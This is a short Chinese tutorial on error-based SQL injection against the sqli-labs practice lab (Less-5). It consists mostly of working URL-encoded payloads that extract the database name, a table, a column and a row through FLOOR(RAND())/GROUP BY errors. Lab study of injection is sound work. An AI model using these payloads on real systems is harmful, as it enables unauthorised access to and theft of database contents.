报错型sql注入方法
1、判断提交方式
字符型:
2、构造整合:
该出的整合方法为 '
3、运用hackbar插件,可以得到要访问的URL
库名:security
点击database会出现访问数据库的语句,将改语句复制粘贴至URL中,即可得到数据库名。
URL语句:
http://192.168.246.129/sqli-labs-master/Less-5/?id=1%20%27%20AND(SELECT%201%20FROM%20(SELECT%20COUNT(*),CONCAT((SELECT(SELECT%20CONCAT(CAST(DATABASE()%20AS%20CHAR),0x7e))%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=DATABASE()%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+
表名:emails
同上点击tables,输入数据库名称得到访问表名
URL语句:
http://192.168.246.129/sqli-labs-master/Less-5/?id=1%20%27%20%20AND(SELECT%201%20FROM%20(SELECT%20COUNT(*),CONCAT((SELECT(SELECT%20CONCAT(CAST(table_name%20AS%20CHAR),0x7e))%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20table_schema=0x7365637572697479%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+
列名:id
URL语句:
http://192.168.246.129/sqli-labs-master/Less-5/?id=1%20%27%20%20%20AND%20(SELECT%201%20FROM%20(SELECT%20COUNT(*),CONCAT((SELECT(SELECT%20CONCAT(CAST(column_name%20AS%20CHAR),0x7e))%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20table_name=0x656d61696c73%20AND%20table_schema=0x7365637572697479%20LIMIT%200,1),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.TABLES%20GROUP%20BY%20x)a)%20--+
数据:1
URL语句:
AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(CONCAT(id) AS CHAR),0x7e)) FROM security.emails LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)